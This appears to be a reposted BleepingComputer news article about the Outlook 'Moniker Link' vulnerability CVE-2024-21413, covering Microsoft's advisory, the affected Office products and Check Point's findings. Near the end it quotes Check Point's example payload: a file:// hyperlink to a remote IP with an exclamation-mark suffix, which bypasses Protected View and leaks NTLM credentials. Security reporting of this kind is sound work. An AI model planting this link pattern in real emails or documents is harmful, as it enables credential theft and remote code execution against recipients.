Update February 14, 16:50 EST: Article and title revised after Microsoft retracted the “active exploitation” update added to the CVE-2024-21413 advisory.
Microsoft says remote unauthenticated attackers can trivially exploit a critical Outlook security vulnerability that also lets them bypass the Office Protected View.
Discovered by Check Point vulnerability researcher Haifei Li and tracked as CVE-2024-21413, this bug leads to remote code execution (RCE) when opening emails with malicious links using a vulnerable Microsoft Outlook version.
This happens because the flaw also enables attackers to bypass the Protected View (designed to block harmful content embedded in Office files by opening them in read-only mode) and open malicious Office files in editing mode.
Redmond also warned that the Preview Pane is an attack vector for this security flaw, allowing successful exploitation even when previewing maliciously crafted Office documents.
Unauthenticated attackers can exploit CVE-2024-21413 remotely in low-complexity attacks that don’t require user interaction.
“An attacker who successfully exploited this vulnerability could gain high privileges, which include read, write, and delete functionality,” Microsoft explains.
“An attacker could craft a malicious link that bypasses the Protected View Protocol, which leads to the leaking of local NTLM credential information and remote code execution (RCE).”
CVE-2024-21413 affects multiple Office products, including Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise, as well as Microsoft Outlook 2016 and Microsoft Office 2019 (under extended support).
Exclamation mark to bypass Outlook protections
As explained by Check Point in a report published today, the vulnerability they dubbed Moniker Link allows attackers to bypass built-in Outlook protections for malicious links embedded in emails using the file:// protocol and adding an exclamation mark to URLs pointing to attacker-controlled servers.
The exclamation mark is added right after the document extension, together with some random text (in their example, Check Point used “something”), as shown below:
*<a href="https://www.bleepingcomputer.com/news/security/new-critical-microsoft-outlook-rce-bug-is-trivial-to-exploit/file:///10.10.111.111testtest.rtf!something">CLICK ME</a>*
This type of hyperlink bypasses Outlook security restriction, and Outlook will access the “\10.10.111.111testtest.rtf” remote resource when the link is clicked…
Click Here to Read the Full Original Article at BleepingComputer…